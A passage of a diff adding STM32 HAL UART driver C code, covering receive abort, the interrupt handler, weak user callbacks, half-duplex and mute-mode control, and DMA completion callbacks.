(USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + huart->AbortTransmitCpltCallback(huart); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_UART_AbortTransmitCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing Receive transfer (Interrupt mode). + * @param huart UART handle. + * @note This procedure could be used for aborting any ongoing Rx transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable UART Interrupts (Rx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_AbortReceive_IT(UART_HandleTypeDef *huart) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* If Reception till IDLE event was ongoing, disable IDLEIE interrupt */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_IDLEIE)); + } + + /* Disable the UART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the UART DMA Rx stream : use blocking DMA Abort API (no callback) */ + if (huart->hdmarx != NULL) + { + /* Set the UART DMA Abort callback : + will lead to call HAL_UART_AbortCpltCallback() at end of DMA abort procedure */ + huart->hdmarx->XferAbortCallback = UART_DMARxOnlyAbortCallback; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(huart->hdmarx) != HAL_OK) + { + /* Call Directly huart->hdmarx->XferAbortCallback function in case of error */ + huart->hdmarx->XferAbortCallback(huart->hdmarx); + } + } + else + { + /* Reset Rx transfer counter */ + huart->RxXferCount = 0x00U; + + /* Restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + huart->AbortReceiveCpltCallback(huart); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_UART_AbortReceiveCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + } + else + { + /* Reset Rx transfer counter */ + huart->RxXferCount = 0x00U; + + /* Restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + huart->AbortReceiveCpltCallback(huart); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_UART_AbortReceiveCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + + return HAL_OK; +} + +/** + * @brief This function handles UART interrupt request. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +void HAL_UART_IRQHandler(UART_HandleTypeDef *huart) +{ + uint32_t isrflags = READ_REG(huart->Instance->SR); + uint32_t cr1its = READ_REG(huart->Instance->CR1); + uint32_t cr3its = READ_REG(huart->Instance->CR3); + uint32_t errorflags = 0x00U; + uint32_t dmarequest = 0x00U; + + /* If no error occurs */ + errorflags = (isrflags & (uint32_t)(USART_SR_PE | USART_SR_FE | USART_SR_ORE | USART_SR_NE)); + if (errorflags == RESET) + { + /* UART in mode Receiver -------------------------------------------------*/ + if (((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + UART_Receive_IT(huart); + return; + } + } + + /* If some errors occur */ + if ((errorflags != RESET) && (((cr3its & USART_CR3_EIE) != RESET) + || ((cr1its & (USART_CR1_RXNEIE | USART_CR1_PEIE)) != RESET))) + { + /* UART parity error interrupt occurred ----------------------------------*/ + if (((isrflags & USART_SR_PE) != RESET) && ((cr1its & USART_CR1_PEIE) != RESET)) + { + huart->ErrorCode |= HAL_UART_ERROR_PE; + } + + /* UART noise error interrupt occurred -----------------------------------*/ + if (((isrflags & USART_SR_NE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + huart->ErrorCode |= HAL_UART_ERROR_NE; + } + + /* UART frame error interrupt occurred -----------------------------------*/ + if (((isrflags & USART_SR_FE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + huart->ErrorCode |= HAL_UART_ERROR_FE; + } + + /* UART Over-Run interrupt occurred --------------------------------------*/ + if (((isrflags & USART_SR_ORE) != RESET) && (((cr1its & USART_CR1_RXNEIE) != RESET) + || ((cr3its & USART_CR3_EIE) != RESET))) + { + huart->ErrorCode |= HAL_UART_ERROR_ORE; + } + + /* Call UART Error Call back function if need be --------------------------*/ + if (huart->ErrorCode != HAL_UART_ERROR_NONE) + { + /* UART in mode Receiver -----------------------------------------------*/ + if (((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + UART_Receive_IT(huart); + } + + /* If Overrun error occurs, or if any error occurs in DMA mode reception, + consider error as blocking */ + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR); + if (((huart->ErrorCode & HAL_UART_ERROR_ORE) != RESET) || dmarequest) + { + /* Blocking error : transfer is aborted + Set the UART state ready to be able to start again the process, + Disable Rx Interrupts, and disable Rx DMA request, if ongoing */ + UART_EndRxTransfer(huart); + + /* Disable the UART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the UART DMA Rx stream */ + if (huart->hdmarx != NULL) + { + /* Set the UART DMA Abort callback : + will lead to call HAL_UART_ErrorCallback() at end of DMA abort procedure */ + huart->hdmarx->XferAbortCallback = UART_DMAAbortOnError; + if (HAL_DMA_Abort_IT(huart->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + huart->hdmarx->XferAbortCallback(huart->hdmarx); + } + } + else + { + /* Call user error callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + huart->ErrorCallback(huart); +#else + /*Call legacy weak error callback*/ + HAL_UART_ErrorCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + } + else + { + /* Call user error callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + huart->ErrorCallback(huart); +#else + /*Call legacy weak error callback*/ + HAL_UART_ErrorCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + } + else + { + /* Non Blocking error : transfer could go on. + Error is notified to user through user error callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + huart->ErrorCallback(huart); +#else + /*Call legacy weak error callback*/ + HAL_UART_ErrorCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + + huart->ErrorCode = HAL_UART_ERROR_NONE; + } + } + return; + } /* End if some error occurs */ + + /* Check current reception Mode : + If Reception till IDLE event has been selected : */ + if ((huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + && ((isrflags & USART_SR_IDLE) != 0U) + && ((cr1its & USART_SR_IDLE) != 0U)) + { + __HAL_UART_CLEAR_IDLEFLAG(huart); + + /* Check if DMA mode is enabled in UART */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + /* DMA mode enabled */ + /* Check received length : If all expected data are received, do nothing, + (DMA cplt callback will be called). + Otherwise, if at least one data has already been received, IDLE event is to be notified to user */ + uint16_t nb_remaining_rx_data = (uint16_t) __HAL_DMA_GET_COUNTER(huart->hdmarx); + if ((nb_remaining_rx_data > 0U) + && (nb_remaining_rx_data < huart->RxXferSize)) + { + /* Reception is not complete */ + huart->RxXferCount = nb_remaining_rx_data; + + /* In Normal mode, end DMA xfer and HAL UART Rx process*/ + if (huart->hdmarx->Init.Mode != DMA_CIRCULAR) + { + /* Disable PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_PEIE); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* Disable the DMA transfer for the receiver request by resetting the DMAR bit + in the UART CR3 register */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* At end of Rx process, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); + + /* Last bytes received, so no need as the abort is immediate */ + (void)HAL_DMA_Abort(huart->hdmarx); + } +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx Event callback*/ + huart->RxEventCallback(huart, (huart->RxXferSize - huart->RxXferCount)); +#else + /*Call legacy weak Rx Event callback*/ + HAL_UARTEx_RxEventCallback(huart, (huart->RxXferSize - huart->RxXferCount)); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + return; + } + else + { + /* DMA mode not enabled */ + /* Check received length : If all expected data are received, do nothing. + Otherwise, if at least one data has already been received, IDLE event is to be notified to user */ + uint16_t nb_rx_data = huart->RxXferSize - huart->RxXferCount; + if ((huart->RxXferCount > 0U) + && (nb_rx_data > 0U)) + { + /* Disable the UART Parity Error Interrupt and RXNE interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + + /* Disable the UART Error Interrupt: (Frame error, noise error, overrun error) */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* Rx process is completed, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx complete callback*/ + huart->RxEventCallback(huart, nb_rx_data); +#else + /*Call legacy weak Rx Event callback*/ + HAL_UARTEx_RxEventCallback(huart, nb_rx_data); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + return; + } + } + + /* UART in mode Transmitter ------------------------------------------------*/ + if (((isrflags & USART_SR_TXE) != RESET) && ((cr1its & USART_CR1_TXEIE) != RESET)) + { + UART_Transmit_IT(huart); + return; + } + + /* UART in mode Transmitter end --------------------------------------------*/ + if (((isrflags & USART_SR_TC) != RESET) && ((cr1its & USART_CR1_TCIE) != RESET)) + { + UART_EndTransmit_IT(huart); + return; + } +} + +/** + * @brief Tx Transfer completed callbacks. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_TxCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx Half Transfer completed callbacks. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_TxHalfCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_TxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callbacks. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_RxCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Half Transfer completed callbacks. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_RxHalfCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_RxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief UART error callbacks. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_ErrorCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief UART Abort Complete callback. + * @param huart UART handle. + * @retval None + */ +__weak void HAL_UART_AbortCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_UART_AbortCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief UART Abort Complete callback. + * @param huart UART handle. + * @retval None + */ +__weak void HAL_UART_AbortTransmitCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_UART_AbortTransmitCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief UART Abort Receive Complete callback. + * @param huart UART handle. + * @retval None + */ +__weak void HAL_UART_AbortReceiveCpltCallback(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_UART_AbortReceiveCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief Reception Event Callback (Rx event notification called after use of advanced reception service). + * @param huart UART handle + * @param Size Number of data available in application reception buffer (indicates a position in + * reception buffer until which, data are available) + * @retval None + */ +__weak void HAL_UARTEx_RxEventCallback(UART_HandleTypeDef *huart, uint16_t Size) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + UNUSED(Size); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_UARTEx_RxEventCallback can be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup UART_Exported_Functions_Group3 Peripheral Control functions + * @brief UART control functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control the UART: + (+) HAL_LIN_SendBreak() API can be helpful to transmit the break character. + (+) HAL_MultiProcessor_EnterMuteMode() API can be helpful to enter the UART in mute mode. + (+) HAL_MultiProcessor_ExitMuteMode() API can be helpful to exit the UART mute mode by software. + (+) HAL_HalfDuplex_EnableTransmitter() API to enable the UART transmitter and disables the UART receiver in Half Duplex mode + (+) HAL_HalfDuplex_EnableReceiver() API to enable the UART receiver and disables the UART transmitter in Half Duplex mode + +@endverbatim + * @{ + */ + +/** + * @brief Transmits break characters. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LIN_SendBreak(UART_HandleTypeDef *huart) +{ + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(huart->Instance)); + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->gState = HAL_UART_STATE_BUSY; + + /* Send break characters */ + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_SBK); + + huart->gState = HAL_UART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief Enters the UART in mute mode. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MultiProcessor_EnterMuteMode(UART_HandleTypeDef *huart) +{ + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(huart->Instance)); + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->gState = HAL_UART_STATE_BUSY; + + /* Enable the USART mute mode by setting the RWU bit in the CR1 register */ + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_RWU); + + huart->gState = HAL_UART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief Exits the UART mute mode: wake up software. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MultiProcessor_ExitMuteMode(UART_HandleTypeDef *huart) +{ + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(huart->Instance)); + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->gState = HAL_UART_STATE_BUSY; + + /* Disable the USART mute mode by clearing the RWU bit in the CR1 register */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_RWU); + + huart->gState = HAL_UART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief Enables the UART transmitter and disables the UART receiver. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HalfDuplex_EnableTransmitter(UART_HandleTypeDef *huart) +{ + uint32_t tmpreg = 0x00U; + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->gState = HAL_UART_STATE_BUSY; + + /*-------------------------- USART CR1 Configuration -----------------------*/ + tmpreg = huart->Instance->CR1; + + /* Clear TE and RE bits */ + tmpreg &= (uint32_t)~((uint32_t)(USART_CR1_TE | USART_CR1_RE)); + + /* Enable the USART's transmit interface by setting the TE bit in the USART CR1 register */ + tmpreg |= (uint32_t)USART_CR1_TE; + + /* Write to USART CR1 */ + WRITE_REG(huart->Instance->CR1, (uint32_t)tmpreg); + + huart->gState = HAL_UART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief Enables the UART receiver and disables the UART transmitter. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HalfDuplex_EnableReceiver(UART_HandleTypeDef *huart) +{ + uint32_t tmpreg = 0x00U; + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->gState = HAL_UART_STATE_BUSY; + + /*-------------------------- USART CR1 Configuration -----------------------*/ + tmpreg = huart->Instance->CR1; + + /* Clear TE and RE bits */ + tmpreg &= (uint32_t)~((uint32_t)(USART_CR1_TE | USART_CR1_RE)); + + /* Enable the USART's receive interface by setting the RE bit in the USART CR1 register */ + tmpreg |= (uint32_t)USART_CR1_RE; + + /* Write to USART CR1 */ + WRITE_REG(huart->Instance->CR1, (uint32_t)tmpreg); + + huart->gState = HAL_UART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup UART_Exported_Functions_Group4 Peripheral State and Errors functions + * @brief UART State and Errors functions + * +@verbatim + ============================================================================== + ##### Peripheral State and Errors functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to return the State of + UART communication process, return Peripheral Errors occurred during communication + process + (+) HAL_UART_GetState() API can be helpful to check in run-time the state of the UART peripheral. + (+) HAL_UART_GetError() check in run-time errors that could be occurred during communication. + +@endverbatim + * @{ + */ + +/** + * @brief Returns the UART state. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL state + */ +HAL_UART_StateTypeDef HAL_UART_GetState(UART_HandleTypeDef *huart) +{ + uint32_t temp1 = 0x00U, temp2 = 0x00U; + temp1 = huart->gState; + temp2 = huart->RxState; + + return (HAL_UART_StateTypeDef)(temp1 | temp2); +} + +/** + * @brief Return the UART error code + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART. + * @retval UART Error Code + */ +uint32_t HAL_UART_GetError(UART_HandleTypeDef *huart) +{ + return huart->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @defgroup UART_Private_Functions UART Private Functions + * @{ + */ + +/** + * @brief Initialize the callbacks to their default values. + * @param huart UART handle. + * @retval none + */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) +void UART_InitCallbacksToDefault(UART_HandleTypeDef *huart) +{ + /* Init the UART Callback settings */ + huart->TxHalfCpltCallback = HAL_UART_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + huart->TxCpltCallback = HAL_UART_TxCpltCallback; /* Legacy weak TxCpltCallback */ + huart->RxHalfCpltCallback = HAL_UART_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + huart->RxCpltCallback = HAL_UART_RxCpltCallback; /* Legacy weak RxCpltCallback */ + huart->ErrorCallback = HAL_UART_ErrorCallback; /* Legacy weak ErrorCallback */ + huart->AbortCpltCallback = HAL_UART_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + huart->AbortTransmitCpltCallback = HAL_UART_AbortTransmitCpltCallback; /* Legacy weak AbortTransmitCpltCallback */ + huart->AbortReceiveCpltCallback = HAL_UART_AbortReceiveCpltCallback; /* Legacy weak AbortReceiveCpltCallback */ + huart->RxEventCallback = HAL_UARTEx_RxEventCallback; /* Legacy weak RxEventCallback */ + +} +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + +/** + * @brief DMA UART transmit process complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* DMA Normal mode*/ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) == 0U) + { + huart->TxXferCount = 0x00U; + + /* Disable the DMA transfer for transmit request by setting the DMAT bit + in the UART CR3 register */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + /* Enable the UART Transmit Complete Interrupt */ + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_TCIE); + + } + /* DMA Circular mode */ + else + { +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Tx complete callback*/ + huart->TxCpltCallback(huart); +#else + /*Call legacy weak Tx complete callback*/ + HAL_UART_TxCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } +} + +/** + * @brief DMA UART transmit process half complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMATxHalfCplt(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Tx complete callback*/ + huart->TxHalfCpltCallback(huart); +#else + /*Call legacy weak Tx complete callback*/ + HAL_UART_TxHalfCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA UART receive process complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* DMA Normal mode*/ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) == 0U) + { + huart->RxXferCount = 0U; + + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_PEIE); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* Disable the DMA transfer for the receiver request by setting the DMAR bit + in the UART CR3 register */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* At end of Rx process, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + + /* If Reception till IDLE event has been selected, Disable IDLE Interrupt */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); + } + } + + /* Check current reception Mode : + If Reception till IDLE event has been selected : use Rx Event callback */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx Event callback*/ + huart->RxEventCallback(huart, huart->RxXferSize); +#else + /*Call legacy weak Rx Event callback*/ + HAL_UARTEx_RxEventCallback(huart, huart->RxXferSize); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + else + { + /* In other cases : use Rx Complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx complete callback*/ + huart->RxCpltCallback(huart); +#else + /*Call legacy weak Rx complete callback*/ + HAL_UART_RxCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } +} + +/** + * @brief DMA UART receive process half complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMARxHalfCplt(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Check current reception Mode : + If Reception till IDLE event has been selected : use Rx Event callback */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx Event callback*/ + huart->RxEventCallback(huart, huart->RxXferSize / 2U); +#else + /*Call legacy weak Rx Event callback*/ + HAL_UARTEx_RxEventCallback(huart, huart->RxXferSize / 2U); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + else + { + /* In other cases : use Rx Half Complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx Half complete callback*/ + huart->RxHalfCpltCallback(huart); +#else + /*Call legacy weak Rx Half complete callback*/ + HAL_UART_RxHalfCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } +} + +/** + * @brief DMA UART communication error callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMAError(DMA_HandleTypeDef *hdma) +{ + uint32_t dmarequest = 0x00U; + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Stop UART DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT); + if ((huart->gState == HAL_UART_STATE_BUSY_TX) && dmarequest) + { + huart->TxXferCount = 0x00U; + UART_EndTxTransfer(huart); + } + + /* Stop UART DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR); + if ((huart->RxState == HAL_UART_STATE_BUSY_RX) && dmarequest) + { + huart->RxXferCount = 0x00U; + UART_EndRxTransfer(huart); + } + + huart->ErrorCode |= HAL_UART_ERROR_DMA; +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + huart->ErrorCallback(huart); +#else + /*Call legacy weak error callback*/ + HAL_UART_ErrorCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief This function handles UART Communication Timeout. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param Flag specifies the UART flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Tickstart Tick start value + * @param Timeout Timeout duration + * @retval HAL status + */ +static HAL_StatusTypeDef UART_WaitOnFlagUntilTimeout(UART_HandleTypeDef *huart, uint32_t Flag, FlagStatus Status, + uint32_t Tickstart, uint32_t Timeout) +{ + /* Wait until flag is set */ + while ((__HAL_UART_GET_FLAG(huart, Flag) ? SET : RESET) == Status) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if ((Timeout == 0U) || ((HAL_GetTick() - Tickstart) > Timeout)) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE)); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_TIMEOUT; + } + } + } + return HAL_OK; +} + +/** + * @brief Start Receive operation in interrupt mode. + * @note This function could be called by all HAL UART API providing reception in Interrupt mode. + * @note When calling this function, parameters validity is considered as already checked, + * i.e. Rx State, buffer address, ... + * UART Handle is assumed as Locked. + * @param huart UART handle. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef UART_Start_Receive_IT(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) 